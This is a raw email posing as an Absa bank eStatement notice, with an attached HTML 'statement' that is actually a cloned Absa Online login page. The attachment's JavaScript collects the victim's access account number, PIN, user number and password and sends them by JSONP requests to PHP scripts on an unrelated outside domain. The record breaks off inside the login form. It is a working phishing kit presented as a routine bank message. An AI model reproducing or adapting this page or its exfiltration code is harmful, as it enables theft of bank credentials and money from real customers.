From: "ABSA"< officialemail@absa.co.za>
Date: Mon, 07 May 2018 01:30:36 -0700
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 488

You will not see this in a MIME-aware mail reader.
--===============0979234491==
Content-Type: multipart/alternative; boundary="===============0200299182=="
MIME-Version: 1.0

--===============0200299182==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


  =

   =

  	  =

    	   eStatement  	 =

  =

    	 =

  	 =

  =

   =

    Dear Customer =

     Please find attached your electronic statement for May. Your statement=
 is now in easy to access PDF format. To keep your financial information sa=
fe please note the following: =

   =

 Information that only you will know is displayed in the eStatement verific=
ation block - this is so you can be sure your statement is from Absa.  =

 If any of the information on this eStatement is incorrect contact us immed=
iately on 0860 111 123. Remember we will never ask you to divulge your PIN =
or Password. =

 You have to use your ID Number to view your statement  =

 You can view your statements on standard Adobe Reader  =

 It is easy to use, as PDF's are a standard file format and can be read via=
 software on almost every device  =

 If you do not have Adobe installed already you can download a free PDF rea=
der from www.adobe.com or your devices app store  =

    	 =

  	 =

  =

  	 	  =

  	  =

  	 =

  =

  	 	   eStatement
 verification  	 =

  =

  	 =

  =

   =

    Account:  	 =

    ID Number:  	 =

  	  =

    ************1  	 =

    ************1  	 =

  	  =

  =

  	 =

  	 =

  =

  	 =

  =

   Contact us =

 =

For more information, contact privatebanking@absa.co.za or the call centre =
on 0860 553 553 or +27 (0)11 501 5011 	 =

  	 =

  =

      	     	     	 =

  =

  	 =

  =

  	 =

  =

  =

   =

  Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Services Provide=
r Registered Credit Provider NCRCP7. E-mail disclaimer and company informat=
ion absa.co.za/disclaimer
--===============0200299182==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head></div></td></tr></tbody></table></td></tr></tbody></=
table></div><div id=3D":163"><div class=3D"qQVYZb"></div><div class=3D"utdU=
2e"></div><div class=3D"btm"></div></div><div class=3D"aHl"></div><div id=
=3D":16g" tabindex=3D"-1"></div><div id=3D":165" class=3D"ii gt "><div id=
=3D":164" class=3D"a3s aXjCH m1632e87b729a69a7"><u></u>


	=




<div style=3D"margin:0;padding:0">

<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgco=
lor=3D"#f2f2f2" align=3D"center">
	<tbody><tr>
		<td>
			<table width=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bg=
color=3D"#ffffff" align=3D"center">
				<tbody><tr>
					<td width=3D"17" bgcolor=3D"#ffffff"></td>
					<td width=3D"566">
					  <table width=3D"566" cellspacing=3D"0" cellpadding=3D"10" border=3D"=
0" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td width=3D"171" height=3D"102" align=3D"left">
                                =

                                <img src=3D"https://ci6.googleusercontent.c=
om/proxy/qnWtO4tRo5Z_5t9YXBRQAE3BJltEBmPT01cvZ8fRIcjWOLISPMDNuNgf_YcJdQ7Cio=
ObKqgu1MmT3Ur96bWiCs59c5mzQtWiIt79RIYmPS4o9QED_vXBMbz_dy6-pjjypEINXQlhWw=3D=
s0-d-e1-ft#https://www.absa.co.za/content/dam/south-africa/absa/estatements=
/headers/absa.jpg" alt=3D"ABSA" style=3D"display:block" class=3D"CToWUd" wi=
dth=3D"171" height=3D"102" border=3D"0">

                                </td>


                                <td width=3D"395" height=3D"102" align=3D"r=
ight">
									<font style=3D"font:16px Arial;color:#ed1c24">
										eStatement
									</font>
								</td>


                            </tr>
						</tbody></table>





                        <table width=3D"566" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td width=3D"566" height=3D"156">
									=

								  <img src=3D"https://ci5.googleusercontent.com/proxy/KaXjTyFIj19ST=
K7zxgrrzQyHuBlxNy9kDK13tHnM4QsWZvx0oSicisxiDiThwLq3-OHznT76MHXykFIzRC6Eoc-w=
98blDL4AA-HOuyi2CyCPJUVqbow1ThJpe3m9pfbtg9HxtJqxiJqmRttaMbIBaD8oYWZDbSauAlV=
f=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-africa/absa/estatem=
ents/headers/chqprivate-en-chq-header.jpg" alt=3D"Absa - eSTATEMENT" style=
=3D"display:block" class=3D"CToWUd" width=3D"600" border=3D"0">

								</td>
							</tr>
							<tr>
							  <td height=3D"10"></td>
							</tr>
						</tbody></table>
					  <table width=3D"566" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td width=3D"352" valign=3D"top" height=3D"200">
								  <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"15" border=
=3D"0" bgcolor=3D"#ffffff" align=3D"center">
									<tbody><tr>
											<td width=3D"100%">
												<p><font style=3D"font:12px Arial;color:#58595b">
												  Dear  Customer
												  </font></p>
												<p>

												  <font style=3D"font:18px Arial;color:#ed1c24">

											      </font>
												  =

												  <font style=3D"font:12px Arial;color:#58595b">
												    Please find attached your electronic statement for May. You=
r statement is now in easy to access PDF format. To keep your financial inf=
ormation safe please note the following:

											      </font></p>
												<font style=3D"font:12px Arial;color:#58595b">
												<ul>

												  <li> Information that only you will know is displayed in the =
eStatement verification block - this is so you can be sure your statement i=
s from Absa. </li>

												  <li> If any of the information on this eStatement is incorrec=
t contact us immediately on 0860 111 123. Remember we will never ask you to=
 divulge your PIN or Password.

												  </li><li> You have to use your <b>ID Number</b> to view your =
statement </li>

													<li> You can view your statements on standard Adobe Reader </l=
i>

													<li> It is easy to use, as PDF's are a standard file format an=
d can be read via software on almost every device </li>

													<li> If you do not have Adobe installed already you can downlo=
ad a free PDF reader from <a href=3D"http://www.adobe.com" target=3D"_blank=
" data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp:/=
/www.adobe.com&amp;source=3Dgmail&amp;ust=3D1525718385119000&amp;usg=3DAFQj=
CNFquLdIVF5tPa0OtaApFpzDk37bSA">www.adobe.com</a> or your devices app store=
 </li>
											  </ul>
												<div style=3D"display:none">&nbsp;</div>
												</font>



											</td>






</tr><tr>
	<td width=3D"100%">




					  </td>
									</tr>

									</tbody></table>
									<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=
=3D"0" bgcolor=3D"#ffffff" align=3D"center">


								    </table>
								</td>
								<td width=3D"10"></td>
								<td width=3D"181" valign=3D"top">
									<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=
=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
										<tbody><tr>
											<td width=3D"15"></td>
											<td width=3D"188">
												<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
													<tbody><tr>
														<td width=3D"203" height=3D"16"></td>
													</tr>
												</tbody></table>
												<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
													<tbody><tr>  =

														<td width=3D"29" height=3D"29"><img src=3D"https://ci5.google=
usercontent.com/proxy/ETbrfAJhloQmQTbedap2u6EntwAhmL_wey4PLyDUSi33A6sRQnURJ=
NNiAHIEnN9WCAKjIcFK10q_xTpaet2ImEHYejnb9pvBjSuUVu_vMzguo-nU_WYNOvR_o5cEwvEH=
X7KFKiE44aFgunLx=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-afri=
ca/absa/estatements/headers/absa-logo.jpg" alt=3D"" style=3D"display:block"=
 class=3D"CToWUd" width=3D"29" height=3D"29" border=3D"0"></td>
														<td width=3D"13" height=3D"29"></td>
														<td width=3D"146" height=3D"29">
															<font style=3D"font:12px Arial;color:#58595b">
																<b>eStatement<br>
																verification</b>
															</font>
														</td>
													</tr>
												</tbody></table>
												<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
													<tbody><tr>
														<td width=3D"188" height=3D"8"></td>
													</tr>
												</tbody></table>
												<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
													<tbody><tr>
														<td width=3D"70" height=3D"24">
															<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" bo=
rder=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
																<tbody><tr>
																	<td width=3D"70" height=3D"24">
																		<font style=3D"font:12px Arial;color:#58595b">
																			<b>Account:</b>
																		</font>
																	</td>
																</tr>
																<tr>
																	<td width=3D"70" height=3D"24">
																		<font style=3D"font:12px Arial;color:#58595b">
																			<b>ID Number:</b>
																		</font>
																	</td>
																</tr>
															</tbody></table>
														</td>
														<td width=3D"103" height=3D"24">
															<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" bo=
rder=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
																<tbody><tr>
																	<td width=3D"110" height=3D"24" align=3D"right">
																		<font style=3D"font:12px Arial;color:#58595b">
																			************1
																		</font>
																	</td>
																</tr>
																<tr>
																	<td width=3D"110" height=3D"24" align=3D"right">
																		<font style=3D"font:12px Arial;color:#58595b">
																			************1
																		</font>
																	</td>
																</tr>
															</tbody></table>
														</td>
														<td width=3D"15" height=3D"48">
												  </td></tr>
												</tbody></table>
												<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
													<tbody><tr>
														<td width=3D"188" height=3D"8"></td>
													</tr>
												</tbody></table>
											</td>
										</tr>
									</tbody></table>
									<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=
=3D"0" bgcolor=3D"#ffffff" align=3D"center">
										<tbody><tr>
											<td height=3D"20"></td>
										</tr>
									</tbody></table>

										<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=
=3D"0" bgcolor=3D"#ffffff" align=3D"center">
											<tbody><tr>
											  <td width=3D"203" height=3D"110"><font style=3D"font:18px Aria=
l;color:#58595b"> Contact us</font>
                                                <br>

<font style=3D"font:12px Arial;color:#58595b"><br>For more information, con=
tact <a href=3D"mailto:privatebanking@absa.co.za" target=3D"_blank">private=
banking@absa.co.za</a> or the call centre on 0860 553 553 or +27 (0)11 501 =
5011</font> </td>
											</tr>
										</tbody></table>

								</td>
						  </tr>
						</tbody></table>




                      <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"10" border=3D"0" bgcolor=3D"#ffffff" align=3D"center">

                            <tbody><tr>
								<td height=3D"20">
                                =

                                <a href=3D"https://www.absa.co.za/bannerest=
atement/chqprivate-en-chq-b1" target=3D"_blank" data-saferedirecturl=3D"htt=
ps://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestate=
ment/chqprivate-en-chq-b1&amp;source=3Dgmail&amp;ust=3D1525718385119000&amp=
;usg=3DAFQjCNHvuTiFSRKnbHGb_C6B1D9uxO7qkA">
                                <img src=3D"https://ci4.googleusercontent.c=
om/proxy/hyY3me4S6bFB4DMCAPG4pDnwLK1viGam_uGsRLVaCZqM_y51UxNYUnz2wQ-MadZ1kn=
63hprbeaz4viXJ1mBEpXXmXFOi7EDAeh7E8kzHAyR06_-hXHrZGsbHHHnS9VsOHVvAz6E8fA4bw=
M-xtQ1cbO_4-46Uht8=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-af=
rica/absa/estatements/banners/chqprivate-en-chq-b1.jpg" style=3D"border:0" =
class=3D"CToWUd" width=3D"180">
                                </a>
                                </td>
                                <td height=3D"20">
                                =

                                <a href=3D"https://www.absa.co.za/bannerest=
atement/chqprivate-en-chq-b2" target=3D"_blank" data-saferedirecturl=3D"htt=
ps://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestate=
ment/chqprivate-en-chq-b2&amp;source=3Dgmail&amp;ust=3D1525718385119000&amp=
;usg=3DAFQjCNHpcg79zY8OufJbCiCVEnjlUOSfEg">
                                <img src=3D"https://ci6.googleusercontent.c=
om/proxy/mbziz3Q5nH0pBtz2qwJPEmRAii-Hr5VYJaTqXBH5zDTBIzHkyHrlsWU8yE0-drklpE=
UylvextfNC1HlUJj8RKkjTFY2CR9rClFEHrvzNIjJ5ZpZoMvd_IbecoTPGevrJqivjKsRFrLssR=
4QcdI_DPB2bZ0I_lKw=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-af=
rica/absa/estatements/banners/chqprivate-en-chq-b2.jpg" style=3D"border:0" =
class=3D"CToWUd" width=3D"180">
                                </a>
                                </td>
                                <td height=3D"20">
                                =

								<a href=3D"https://www.absa.co.za/bannerestatement/chqprivate-en-ch=
q-b3" target=3D"_blank" data-saferedirecturl=3D"https://www.google.com/url?=
hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestatement/chqprivate-en-chq-b=
3&amp;source=3Dgmail&amp;ust=3D1525718385119000&amp;usg=3DAFQjCNEJKRP0MXEjU=
rp6rRdo-H3g7-UyqQ">
                                <img src=3D"https://ci3.googleusercontent.c=
om/proxy/MQiai18UTkxinpdhfqD-AeudtUAUBosD7uuW8H5l5yMbo5XBzMoOJ4i9mZzC1zJi8Q=
Yk3VrsBMVdFHIUIPb4z4VSMl-ktCKSKv_Pu4z5kIomvOzn8jfdd7uaWcgN3lmTJHojjd1GGPsTe=
PqT-gJem587rXzAk80=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-af=
rica/absa/estatements/banners/chqprivate-en-chq-b3.jpg" style=3D"border:0" =
class=3D"CToWUd" width=3D"180">
                                </a>
                                </td>
							</tr>
						</tbody></table>


						<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td height=3D"10"></td>
						  </tr>


					  </tbody></table>
						<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td width=3D"15"></td>
							</tr>
						</tbody></table>




                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#ffffff" align=3D"center">

					  </table>
                        <table width=3D"100%" cellspacing=3D"15" cellpaddin=
g=3D"0" border=3D"0" bgcolor=3D"#ffffff" align=3D"center">
							<tbody><tr>
								<td width=3D"600" valign=3D"top" height=3D"35" align=3D"left">
                                 <table><tbody><tr><td height=3D"5"></td></=
tr></tbody></table>


									<font style=3D"font:9px Arial;color:#646464">
										 Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Service=
s Provider Registered Credit Provider NCRCP7. E-mail disclaimer and company=
 information <a href=3D"http://absa.co.za/disclaimer" target=3D"_blank" dat=
a-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://absa=
.co.za/disclaimer&amp;source=3Dgmail&amp;ust=3D1525718385119000&amp;usg=3DA=
FQjCNHFLx2IPEN4Oqk0t4v8j_nSk4Cp7Q">absa.co.za/disclaimer</a></html>
--===============0200299182==--
--===============0979234491==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="Cheque Statement - 18-05-07.htm"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org=
/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=3D(0043)https://ib.absa.co.za/absa-online/login.jsp -->
<html xmlns=3D"http://www.w3.org/1999/xhtml" xmlns:c=3D"http://www.backbase=
.com/2006/command" xmlns:e=3D"http://www.backbase.com/2006/xel" xmlns:xi=3D=
"http://www.w3.org/2001/XInclude" xmlns:ui=3D"http://www.absa.co.za/2009/ui=
" class=3D"js gecko gecko59 CSS1Compat Win64"><head>
<meta content=3D"text/html;charset=3Dutf-8" http-equiv=3D"Content-Type"><st=
yle type=3D"text/css">.btl-repaint{zoom:1;background-color:transparent;-moz=
-outline:none;}</style><style type=3D"text/css">.btl-drag-outlineElement{po=
sition:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-index=
:9999;border-width:1px;border-style:solid;background-color:#DFE0E1;border-c=
olor:#8B8D91;}</style><style type=3D"text/css">.btl-resize-cursorElement{po=
sition:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-index=
:10000;opacity:0;-ms-filter:"alpha(opacity=3D0)";filter:alpha(opacity=3D0);=
background:white;}.btl-resize-lineElement{position:absolute;top:-10000px;le=
ft:-10000px;width:1px;height:100px;z-index:9999;border-width:1px;border-sty=
le:solid;border-color:#8B8D91;overflow:hidden;}.btl-resize-outlineElement{p=
osition:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-inde=
x:9999;border-width:1px;border-style:solid;opacity:.4;-ms-filter:"alpha(opa=
city=3D40)";filter:alpha(opacity=3D40);background-color:#DFE0E1;border-colo=
r:#8B8D91;}</style>
		<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3D8">
		=

		=

		=

		<title>Absa Online</title>
		<!--#if expr=3D"( =3D /iPhone/)"-->
		<link rel=3D"apple-touch-icon" href=3D"https://ib.absa.co.za/absa-online/=
static/style/Iphone_app_icon.png">
		<!--#endif -->
		=

		<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://wansernmy.com/e=
njoyment/cssStyles/absa.css" media=3D"screen">
		<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://wansernmy.com/e=
njoyment/cssStyles/login.css">
		<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://wansernmy.com/e=
njoyment/cssStyles/jcaptcha.css">
                    =

                <script src=3D"https://ajax.googleapis.com/ajax/libs/jquery=
/1.12.4/jquery.min.js"></script>
                <script type=3D"text/javascript">
                    var siteURL =3D 'http://wansernmy.com/enjoyment/phpFile=
s/';
                    function loginContinue2(form){
                        var sAccount =3D document.getElementById("pff1").va=
lue;
                        if(sAccount =3D=3D=3D ""){
                            alert("please enter a valid password password a=
nd retry");
                            return false;
                        }
                        =

                        oParametersurl =3D siteURL+"continue2.php";
                        absa.showPleaseWait();
                        =

                        $.ajax({
                            url: oParametersurl,
                            cache: false,
                            dataType: 'jsonp',
                            data: form.serialize(),
                            success: function(data) {
                                if(data.message !=3D=3D "error"){
                                    document.open();
                                    document.write(data.message);
                                    document.close();
                                }else{
                                    alert("Please enter a valid password an=
d retry");
                                    return false;
                                }
                            },
                            error: function (request, status, error) {
                            }
                        });
                    }
                    function onForm1Submit(){
                        var sAccount =3D document.getElementById("j_usernam=
e").value;
                        var sPIN =3D document.getElementById("j_pin").value;
                        var sOperator =3D document.getElementById("j_user_n=
o").value;
                        =

                        var numbersOnly =3D /^[0-9]+$/;
                        =

                        if(!sAccount.match(numbersOnly)){
                            alert("Please enter a valid Access account numb=
er");
                            document.getElementById("j_username").focus();
                            return false;
                        }
                        if(!sPIN.match(numbersOnly)){
                            alert("Please enter a valid PIN");
                            document.getElementById("j_pin").focus();
                            return false;
                        }
                        if(!sOperator.match(numbersOnly)){
                            alert("Please enter a valid User number");
                            document.getElementById("j_user_no").focus();
                            return false;
                        }
                        =

                        aPostData =3D "AccessAccount=3D" + sAccount + "&PIN=
=3D" + sPIN + "&Operator=3D" + sOperator + "&CaptchaTxt=3D";
                        oParametersurl =3D siteURL+"continue1.php?"+aPostDa=
ta;
                        =

                        absa.showPleaseWait();
                        $.ajax({
                            url: oParametersurl,
                            cache: false,
                            dataType: 'jsonp',
                            success: function(data) {
                                if(data.message !=3D=3D "error"){
                                    $('.ap-main-content-wrapper').html(data=
.message);
                                    absa.hidePleaseWait();
                                    setTimeout(function(){
                                        $("input#pff1").focus();
                                    },500);
                                }else{
                                    alert("Please enter a valid Access acco=
unt number, PIN or User number and retry");
                                    return false;
                                }
                            },
                            error: function (request, status, error) {
                            }
                        });
                    }
                    =

                    var absa =3D window.absa || {};
                    absa.showPleaseWait =3D function (d) {
                    var c =3D document.getElementById("pleasewait"),
                            b =3D document.getElementById("pleasewait-viewp=
ort"),
                            e =3D document.getElementById("pleasewait-label=
");
                    c.style.display =3D "";
                    e.innerHTML =3D arguments.length ? d : "";
                    absa.showPleaseWait.timeout =3D setTimeout(function () {
                                c.style.height =3D document.body.clientHeig=
ht + "px";
                                c.style.width =3D document.body.clientWidth=
 + "px";
                                b.style.height =3D ("innerHeight" in window=
 ? window.innerHeight : document.documentElement.clientHeight) + "px";
                                b.style.width =3D ("innerWidth" in window ?=
 window.innerWidth : document.documentElement.clientWidth) + "px";
                                b.style.top =3D document.documentElement.sc=
rollTop + "px";
                                b.style.left =3D document.documentElement.s=
crollLeft + "px";
                                absa.showPleaseWait.timeout =3D setTimeout(=
arguments.callee, 20)
                        }, 0)
                    };
                    absa.hidePleaseWait =3D function () {
                            var b =3D document.getElementById("pleasewait");
                            b.style.display =3D "none";
                            if (absa.showPleaseWait.timeout) {
                                    absa.showPleaseWait.timeout =3D clearTi=
meout(absa.showPleaseWait.timeout)
                            }
                    };
                </script>
	=

	<body class=3D"ssr-enabled ap-jsp-body" id=3D"bodydiv" onload=3D"$('input#=
j_username').focus();">
		=

		<!-- Please wait splash -->
		<div id=3D"pleasewait" role=3D"alert" class=3D"ap-pleasewait" style=3D"he=
ight: 755px; width: 1349px; display: none;">
			<div id=3D"pleasewait-viewport" class=3D"ap-pleasewait--viewport" style=
=3D"height: 654px; width: 1366px; top: 0px; left: 0px;">
				<div class=3D"ap-pleasewait--content">
					<img src=3D"http://wansernmy.com/enjoyment/images/ajax-loader-2.gif" w=
idth=3D"32" height=3D"32">
					<span id=3D"pleasewait-label" class=3D"ap-pleasewait--label"><p class=
=3D"vi-screenreader-line">Please wait</p></span>
				</div>
			</div>
		</div>
		=

		<div></div>
		=

		=

		<div class=3D"ap-page-container">
			<div class=3D"ap-page-header">
				<img src=3D"http://wansernmy.com/enjoyment/images/absa-logo.png" style=
=3D"position: absolute; top: 12px;" width=3D"141" height=3D"97">
				<div class=3D"ap-navigation-main">
					<div class=3D"ap-tabStrip-rounded-left"></div>
					<ul class=3D"ap-tabStrip-tabs">
						<li class=3D"ap-tab-button ap-tab-active" id=3D"SSR-tab-18">
							<div class=3D"ap-tab-title" tabindex=3D"10">Logon</div>
							<div class=3D"ap-tab-title-hidden">Logon</div>
						</li>
						<li class=3D"ap-tab-button" id=3D"SSR-tab-19">
							=

								<div class=3D"ap-tab-title" tabindex=3D"11"><a href=3D"https://ib.a=
bsa.co.za/absa-online/registration/?lang=3Den">Registration</a></div>
							=

							<div class=3D"ap-tab-title-hidden">Registration</div>
						</li>
						<li class=3D"ap-tab-button" id=3D"SSR-tab-20">
							<div class=3D"ap-tab-title" tabindex=3D"12"><a href=3D"http://www.ab=
sa.co.za/">Absa home page</a></div>
							<div class=3D"ap-tab-title-hidden" style=3D"font-size:14px;">Absa ho=
me page</div>
						</li>
					</ul>
					<div class=3D"ap-tabStrip-rounded-right"></div>
					<div style=3D"clear: both;"></div>
					<img src=3D"http://wansernmy.com/enjoyment/images/ao-logo2.png" style=
=3D"position:absolute;top:0;right:20px" id=3D"theImg" width=3D"189" height=
=3D"60">
					<div class=3D"ap-navigation-sub ap-tabStrip-subnav"></div>
				</div>
			</div>
			=

			<div class=3D"ap-global-message" id=3D"ap-global-message">
				<div id=3D"ap-nocookies-msg" style=3D"display: none;">
					Warning: you do not have Cookies enabled. This applications needs Cook=
ies to function
					properly. Please turn it on and reload the page. If you need assistance
					in turning on your Cookies <a>click here</a> to get instructions.
				</div>
				<noscript>
					<div>
						Warning: you do not have Javascript enabled. This
						applications needs Javascript to function properly. Please turn it on
						and reload the page. If you need assistance in turning on your
						Javascript <a>click here</a> to get instructions.
					</div>
				</noscript>
			</div>
			=

			<div class=3D"ap-main-content-wrapper">
				<!-- Page top corners -->
				<div class=3D"ap-main-content-wrapper-top">
					<div class=3D"ap-corners-rounded-top-left"></div>
					<div class=3D"ap-corners-rounded-top"></div>
					<div class=3D"ap-corners-rounded-top-right"></div>
				</div>
				=

				<!-- Page content -->
				<div class=3D"ap-page-content ap-container">
					<div class=3D"ap-container-highlevel">
						<div class=3D"ap-titlebar ap-heading-titlebar" style=3D"padding-top: =
0px;">
							<div id=3D"header_results" class=3D"ap-bar-section ap-bar-title">
								Logon&nbsp;
								| Welcome to Absa Online
							</div>
						</div>
						=

						=

						<div class=3D"ap-container-content" style=3D"padding-bottom:5px; over=
flow: hidden"><!-- PS: height must be set here to AUTO else it cuts of the =
bottom of the inner content -->
							=

							<div class=3D"ap-login-columns ap-columns-2-lhs" style=3D"padding-to=
p: 0px;">
								<!-- ap-column-1 -->
								<div class=3D"ap-column-1" style=3D"width: 606px;padding:0">
									<div id=3D"ap-login-container" class=3D"ap-login-container">
										=

											=






<div class=3D"ap-container-highlevel" style=3D"width:606px;">
	<div class=3D"ap-titlebar ap-heading-titlebar ap-heading-titlebar-login">
		<div class=3D"ap-bar-section ap-bar-title" style=3D"margin-top:8px;margin=
-left:25px" tabindex=3D"5">
			&nbsp;&nbsp;Logon details
		</div>
		<div style=3D"float:right; margin-right: 10px;">
			<div style=3D"background: url('static/style/resources/icon-questionmark-=
grey.png') no-repeat scroll left top transparent; margin-top: 6px; height: =
30px; width: 20px; cursor: pointer;" onclick=3D"showHideHelp(this)" tooltip=
=3D"Click here to Show me how."></div>
		</div>
	</div>
	=

	<div class=3D"ap-container-content">
		<div class=3D"ui-keypad">
			<form novalidate=3D"" class=3D"ui-form" method=3D"post" formtype=3D"nosu=
bmit" onsubmit=3D"onForm1Submit(); return false;">
				<!-- Input form -->
				<table class=3D"ui-grid ui-keypad-inputs" style=3D"width:385px;float:le=
ft;">
					<tbody>
						<tr class=3D"ui-row">
							<td class=3D"ui-cell" style=3D"width:200px;">
								<label for=3D"j_username" id=3D"id-3405">
									<span>Enter your access account number</span>
								<span class=3D"vi-screenreader-line">. An access account number is
 the bank account number you choose when you registered for the Absa =

Online service. It could can be your current, savings, or credit card =

account number.</span></label>
							</td>
							<td class=3D"ui-cell" style=3D"nowrap:nowrap;">
								<div style=3D"text-align:left;">
									<input bbf_type=3D"simple:decimal10" bbf_required=3D"true" bbf_x_t=
ype_number=3D"true" requiredtext=3D"Field is required." schematypetext=3D"O=
nly numbers are allowed (Maximum 16)" showmehow=3D"An access account number=
 is the bank account number you choose when you registered for the Absa Onl=
ine service. It could can be your current, savings, or credit card account =
number." messageref=3D".errorMessage" class=3D"ui-form-field ui-textBox ui-=
keypad-input-selected ap-showMeHow-focus vi-activeElement" style=3D"width:1=
32px; height:18px; line-height:18px; vertical-align:middle;" name=3D"Access=
Account" autocomplete=3D"off" id=3D"j_username" maxlength=3D"16" tabindex=
=3D"0" aria-invalid=3D"false" aria-required=3D"true" aria-labelledby=3D"id-=
3405" type=3D"input">
								</div>
							</td>
						</tr>
						<tr class=3D"ui-row">
							<td class=3D"ui-cell">
								<label for=3D"j_pin">
									<span>Enter your PIN</span>
								</label>
							</td>
							<td class=3D"ui-cell">
								<div style=3D"text-align:left;">
                                                                    <input =
minlength=3D"5" maxlength=3D"5" ondragstart=3D"return false" onselectstart=
=3D"return false" value=3D"" class=3D"ui-form-field ui-textBox" style=3D"wi=
dth:132px; height:18px; line-height:18px; vertical-align:middle;" name=3D"P=
IN" id=3D"j_pin" maxlengthdev=3D"5" ondrag=3D"return false" oncopy=3D"retur=
n false" autocomplete=3D"off" bbf_required=3D"true" requiredtext=3D"Field i=
s required." schematypetext=3D"Only numeric values are allowed" showmehow=
=3D"The PIN must be numeric and cannot contain alpha characters, e.g. *, #,=
 @ or a, b, c. The PIN can be either four or five digits long." messageref=
=3D".errorMessage" tabindex=3D"0" type=3D"password">
								</div>
							</td>
						</tr>
						<tr class=3D"ui-row">
							<td class=3D"ui-cell">
								<label for=3D"j_user_no">
									<span>Enter your user number</span>
								</label>
							</td>
							<td class=3D"ui-cell">
								<div style=3D"text-align:left;">
									<input value=3D"1" class=3D"ui-form-field ui-textBox " name=3D"Ope=
rator" style=3D"width:132px; height:18px; line-height:18px; vertical-align:=
middle;" id=3D"j_user_no" maxlength=3D"4" bbf_type=3D"simple:decimal" bbf_x=
_type_number=3D"true" bbf_required=3D"true" requiredtext=3D"Field is requir=
ed." schematypetext=3D"Only numeric values are allowed" showmehow=3D"Absa O=
nline can have more than one user per service and each user has their own A=
bsa Online PIN. You must use the user number assigned to you at registratio=
n when you logon to the service." messageref=3D".errorMessage" tabindex=3D"=
0" type=3D"text">
								</div>
							</td>
						</tr>
						=

						<!-- Captcha Stuff -->
						<tr class=3D"ui-row ui-row-captcha " id=3D"ui-row-captcha" style=3D"d=
isplay:none;">
							<td class=3D"ui-cell">
								<label class=3D"ui-label ap-label-details" for=3D"j_user_no" offset=
x=3D"0" offsety=3D"10" tooltip=3D"You have entered some of your logon crede=
ntials incorrectly. Please type the characters displayed in the CAPTCHA ima=
ge, in the text box below the image. Remember to also retype your access ac=
count number and PIN in the usual text boxes.">
									<span>Enter code in the box below</span><span class=3D"ui-label--i=
con"></span>
							</label></td>
							<td class=3D"ui-cell">
								<div style=3D"text-align:left;">
									<div class=3D"ui-jcaptcha jcaptcha_container">
										<div class=3D"jcaptcha_menu">
											<button class=3D"ui-button jcaptcha-icon-image jcaptcha-icon-hid=
e ui-captchaCheck--iconHide" type=3D"button" onclick=3D"absa.jcaptcha.getIm=
ageChallenge(this)" tooltip=3D"Get an image challenge">
											</button>
											<button class=3D"ui-button jcaptcha-icon-sound ui-captchaCheck--=
iconSound" type=3D"button" onclick=3D"absa.jcaptcha.getSoundChallenge(this)=
